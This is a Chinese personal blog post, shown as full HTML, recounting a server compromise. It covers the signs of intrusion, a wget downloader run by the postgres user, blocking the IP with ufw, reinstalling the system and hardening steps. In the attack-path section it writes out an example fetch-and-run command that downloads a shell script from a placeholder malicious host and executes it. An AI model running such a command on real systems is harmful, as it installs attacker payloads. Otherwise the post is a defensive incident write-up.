

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Hongxu Li">
  <meta name="keywords" content="">
  
    <meta name="description" content="前言 最近在维护自己的股票 AI 平台时，我发现服务器出现了一些异常：  网络连接异常增多 CPU 持续跑满 出现未知外联 IP  起初以为只是正常请求，但深入排查后，确认：  ⚠️ 服务器已被入侵，并被植入恶意程序   二、异常现象 1. 可疑外联请求 通过命令： 1ss -antp | grep ESTAB 发现服务器存在持续对外连接： 👉 特征：  非我业务使用的 IP 长连接持续存在 多">
<meta property="og:type" content="article">
<meta property="og:title" content="一次服务器被入侵的完整复盘：从异常流量到彻底重装">
<meta property="og:url" content="https://li-hongxu.github.io/2026/04/01/4%E6%9C%881%E6%97%A5%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%85%A5%E4%BE%B5%E4%BA%8B%E4%BB%B6%E5%A4%8D%E7%9B%98/index.html">
<meta property="og:site_name" content="白墨">
<meta property="og:description" content="前言 最近在维护自己的股票 AI 平台时，我发现服务器出现了一些异常：  网络连接异常增多 CPU 持续跑满 出现未知外联 IP  起初以为只是正常请求，但深入排查后，确认：  ⚠️ 服务器已被入侵，并被植入恶意程序   二、异常现象 1. 可疑外联请求 通过命令： 1ss -antp | grep ESTAB 发现服务器存在持续对外连接： 👉 特征：  非我业务使用的 IP 长连接持续存在 多">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://li-hongxu.github.io/2026/04/01/4%E6%9C%881%E6%97%A5%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%85%A5%E4%BE%B5%E4%BA%8B%E4%BB%B6%E5%A4%8D%E7%9B%98/img/d3aec4a484a13f8fa45c07b9ab6c6612.png">
<meta property="article:published_time" content="2026-03-31T19:33:00.000Z">
<meta property="article:modified_time" content="2026-04-08T07:40:39.034Z">
<meta property="article:author" content="Hongxu Li">
<meta property="article:tag" content="Bug">
<meta property="article:tag" content="运维">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://li-hongxu.github.io/2026/04/01/4%E6%9C%881%E6%97%A5%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%85%A5%E4%BE%B5%E4%BA%8B%E4%BB%B6%E5%A4%8D%E7%9B%98/img/d3aec4a484a13f8fa45c07b9ab6c6612.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>一次服务器被入侵的完整复盘：从异常流量到彻底重装 - 白墨</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"li-hongxu.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  



  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>白墨 · Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="一次服务器被入侵的完整复盘：从异常流量到彻底重装"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2026-04-01 03:33" pubdate>
          2026年4月1日 凌晨
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          9 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">一次服务器被入侵的完整复盘：从异常流量到彻底重装</h1>
            
            
              <div class="markdown-body">
                
                <h1>前言</h1>
<p>最近在维护自己的股票 AI 平台时，我发现服务器出现了一些异常：</p>
<ul>
<li>网络连接异常增多</li>
<li>CPU 持续跑满</li>
<li>出现未知外联 IP</li>
</ul>
<p>起初以为只是正常请求，但深入排查后，确认：</p>
<blockquote>
<p>⚠️ 服务器已被入侵，并被植入恶意程序</p>
</blockquote>
<hr>
<h1>二、异常现象</h1>
<h2 id="1-可疑外联请求">1. 可疑外联请求</h2>
<p>通过命令：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">ss -antp | grep ESTAB<br></code></pre></td></tr></table></figure>
<p>发现服务器存在持续对外连接：</p>
<p>👉 特征：</p>
<ul>
<li>非我业务使用的 IP</li>
<li>长连接持续存在</li>
<li>多个端口异常通信</li>
</ul>
<p><img src="img/d3aec4a484a13f8fa45c07b9ab6c6612.png" srcset="/img/loading.gif" lazyload alt="CPU跑满"></p>
<hr>
<h2 id="2-异常进程：wget-疯狂外连">2. 异常进程：wget 疯狂外连</h2>
<p>进一步排查：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">lsof -nP -iTCP -sTCP:SYN_SENT<br></code></pre></td></tr></table></figure>
<p>发现：</p>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-attribute">wget</span> postgres -&gt; <span class="hljs-number">80.64.16.241:80</span><br></code></pre></td></tr></table></figure>
<p>👉 关键点：</p>
<ul>
<li>由 <code>postgres</code> 用户发起</li>
<li>使用 <code>wget</code>（典型下载器行为）</li>
<li>大量 <code>SYN_SENT</code>（说明在疯狂尝试连接）</li>
</ul>
<p>这基本可以判断：</p>
<blockquote>
<p>服务器已被植入“下载器型木马”</p>
</blockquote>
<hr>
<h2 id="3-防火墙异常行为">3. 防火墙异常行为</h2>
<p>尝试封禁恶意 IP：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">sudo</span> ufw deny out to 80.64.16.241<br></code></pre></td></tr></table></figure>
<p>但问题是：</p>
<blockquote>
<p>❗ 攻击仍在持续</p>
</blockquote>
<p>说明：</p>
<ul>
<li>恶意程序在不断尝试新连接</li>
<li>或存在多个控制节点（C2）</li>
</ul>
<hr>
<h1>三、初步判断攻击类型</h1>
<p>综合现象，可以推断这不是普通扫描，而是：</p>
<blockquote>
<p>👉 一次典型的云服务器入侵链</p>
</blockquote>
<h3 id="攻击路径（推测）">攻击路径（推测）</h3>
<ol>
<li>开放端口暴露（高概率是 SSH 或数据库）</li>
<li>被扫描 + 弱口令 / 漏洞利用</li>
</ol>
<p>入侵后执行：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget http://恶意地址/xxx.sh<br>bash xxx.sh<br></code></pre></td></tr></table></figure>
<p>植入程序：</p>
<ul>
<li>挖矿程序（xmrig 类）</li>
<li>下载器（持续拉 payload）</li>
<li>反弹 shell（控制服务器）</li>
</ul>
<hr>
<h1>四、为什么杀毒没查出来？</h1>
<p>我运行了杀毒工具（如 ClamAV）：</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">Infected</span> files: <span class="hljs-number">0</span><br></code></pre></td></tr></table></figure>
<p>但实际上：</p>
<blockquote>
<p>👉 这类攻击通常查不出来</p>
</blockquote>
<h3 id="原因：">原因：</h3>
<ul>
<li>使用“无文件攻击”或临时脚本</li>
<li>二进制文件伪装</li>
<li>进程驻留内存</li>
<li>非病毒签名库覆盖范围</li>
</ul>
<hr>
<h1>五、关键风险点分析</h1>
<p>这次事件暴露了几个致命问题：</p>
<h2 id="1-出口流量未限制">1. 出口流量未限制</h2>
<p>服务器可以自由访问外网：</p>
<p>👉 攻击者可以：</p>
<ul>
<li>下载恶意程序</li>
<li>建立反向连接</li>
</ul>
<hr>
<h2 id="2-服务权限问题">2. 服务权限问题</h2>
<p><code>postgres</code> 用户能执行 <code>wget</code>：</p>
<p>👉 说明：</p>
<ul>
<li>权限隔离不严格</li>
<li>服务账户被利用</li>
</ul>
<hr>
<h2 id="3-端口暴露">3. 端口暴露</h2>
<p>你当时：</p>
<ul>
<li>开了 SSH</li>
<li>开了数据库端口（5432）</li>
</ul>
<p>👉 这是典型攻击入口组合</p>
<hr>
<h1>六、应急处理过程</h1>
<h2 id="Step-1：封禁恶意-IP（临时止血）">Step 1：封禁恶意 IP（临时止血）</h2>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">ufw deny out to 80.64.16.241<br></code></pre></td></tr></table></figure>
<p>效果：有限 ❌</p>
<hr>
<h2 id="Step-2：排查进程（确认感染）">Step 2：排查进程（确认感染）</h2>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">ps aux<br>lsof<br>ss<br></code></pre></td></tr></table></figure>
<p>确认存在异常 <code>wget</code> 行为 ✅</p>
<hr>
<h2 id="Step-3：决定重装服务器（关键决策）">Step 3：决定重装服务器（关键决策）</h2>
<p>原因：</p>
<blockquote>
<p>一旦 root 或服务被入侵，系统已不可信</p>
</blockquote>
<p>👉 正确做法：</p>
<ul>
<li>❌ 不要尝试“清理”</li>
<li>✅ 直接重装</li>
</ul>
<hr>
<h2 id="Step-4：重装前备份">Step 4：重装前备份</h2>
<p>重点备份：</p>
<ul>
<li>项目代码</li>
<li><code>docker-compose.yml</code></li>
<li><code>.env</code></li>
<li>nginx 配置</li>
<li>SSL证书（<code>/etc/letsencrypt</code>）</li>
</ul>
<hr>
<h2 id="Step-5：清空-重建">Step 5：清空 &amp; 重建</h2>
<ul>
<li>重装系统</li>
<li>重新部署服务</li>
<li>更新所有密码</li>
</ul>
<hr>
<h1>七、复盘：这次攻击的本质</h1>
<p>这不是一次“高级攻击”，而是：</p>
<blockquote>
<p>💀 自动化批量扫机 + 弱防护服务器</p>
</blockquote>
<p>攻击者只是：</p>
<ul>
<li>扫描 IP</li>
<li>找开放端口</li>
<li>自动植入脚本</li>
<li>批量控制</li>
</ul>
<p>你只是：</p>
<blockquote>
<p>👉 “被扫到的其中一个”</p>
</blockquote>
<hr>
<h1>八、如何避免下一次？</h1>
<h2 id="✅-必做安全措施">✅ 必做安全措施</h2>
<h3 id="1-SSH-防护">1. SSH 防护</h3>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 禁用密码登录</span><br>PasswordAuthentication no<br><br><span class="hljs-comment"># 修改端口</span><br>Port 51582<br></code></pre></td></tr></table></figure>
<hr>
<h3 id="2-数据库不要公网开放">2. 数据库不要公网开放</h3>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">listen_addresses = <span class="hljs-string">&#x27;localhost&#x27;</span><br></code></pre></td></tr></table></figure>
<p>或只允许指定 IP</p>
<hr>
<h3 id="3-限制服务器“出网”">3. 限制服务器“出网”</h3>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">ufw default deny outgoing<br>ufw allow out 80<br>ufw allow out 443<br></code></pre></td></tr></table></figure>
<hr>
<h3 id="4-最小权限原则">4. 最小权限原则</h3>
<ul>
<li>服务用户不能执行 shell</li>
<li>不要用 root 跑服务</li>
</ul>
<hr>
<h3 id="5-安装安全工具">5. 安装安全工具</h3>
<ul>
<li>fail2ban</li>
<li>rkhunter</li>
<li>chkrootkit</li>
</ul>
<hr>
<h3 id="6-定期巡检">6. 定期巡检</h3>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">ss -antp<br>ps aux<br></code></pre></td></tr></table></figure>
<hr>
<h1>九、一些经验总结</h1>
<p>这次让我意识到一个很重要的事情：</p>
<blockquote>
<p>服务器安全不是“可选项”，而是“默认前提”</p>
</blockquote>
<p>尤其是做产品的人，很容易忽视：</p>
<ul>
<li>只关注业务逻辑</li>
<li>忽略基础设施安全</li>
</ul>
<p>但现实是：</p>
<blockquote>
<p>只要你暴露在公网，就一定会被扫</p>
</blockquote>
<hr>
<h1>十、最后</h1>
<p>这次攻击没有造成数据损失，算是一次“学费不贵但很关键”的教训。</p>
<p>如果你也在用云服务器，一句话送给你：</p>
<p>“你不是会不会被攻击，而是什么时候被攻击”</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/Web%E5%BC%80%E5%8F%91%E7%AC%94%E8%AE%B0/" class="category-chain-item">Web开发笔记</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/Bug/" class="print-no-link">#Bug</a>
      
        <a href="/tags/%E8%BF%90%E7%BB%B4/" class="print-no-link">#运维</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>一次服务器被入侵的完整复盘：从异常流量到彻底重装</div>
      <div>https://li-hongxu.github.io/2026/04/01/4月1日服务器入侵事件复盘/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Hongxu Li</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2026年4月1日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="NC - 非商业性使用">
                    <i class="iconfont icon-cc-nc"></i>
                  </span>
                </a>
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="SA - 相同方式共享">
                    <i class="iconfont icon-cc-sa"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2026/03/13/Bug%E4%BF%AE%E5%A4%8D%EF%BC%9AFastapi%E7%94%9F%E6%88%90%E6%96%87%E6%A1%A3%E6%89%93%E5%BC%80%E6%98%AF%E7%A9%BA%E7%99%BD/" title="Bug修复：Fastapi生成文档打开是空白">
                        <span class="hidden-mobile">Bug修复：Fastapi生成文档打开是空白</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <script type="text/javascript">
    Fluid.utils.loadComments('#comments', function() {
      var light = 'github-light';
      var dark = 'github-dark';
      var schema = document.documentElement.getAttribute('data-user-color-scheme');
      if (schema === 'dark') {
        schema = dark;
      } else {
        schema = light;
      }
      window.UtterancesThemeLight = light;
      window.UtterancesThemeDark = dark;
      var s = document.createElement('script');
      s.setAttribute('src', 'https://utteranc.es/client.js');
      s.setAttribute('repo', 'li-hongxu/li-hongxu.github.io');
      s.setAttribute('issue-term', 'pathname');
      
      s.setAttribute('label', 'utterances');
      
      s.setAttribute('theme', schema);
      s.setAttribute('crossorigin', 'anonymous');
      document.getElementById('comments').appendChild(s);
    })
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
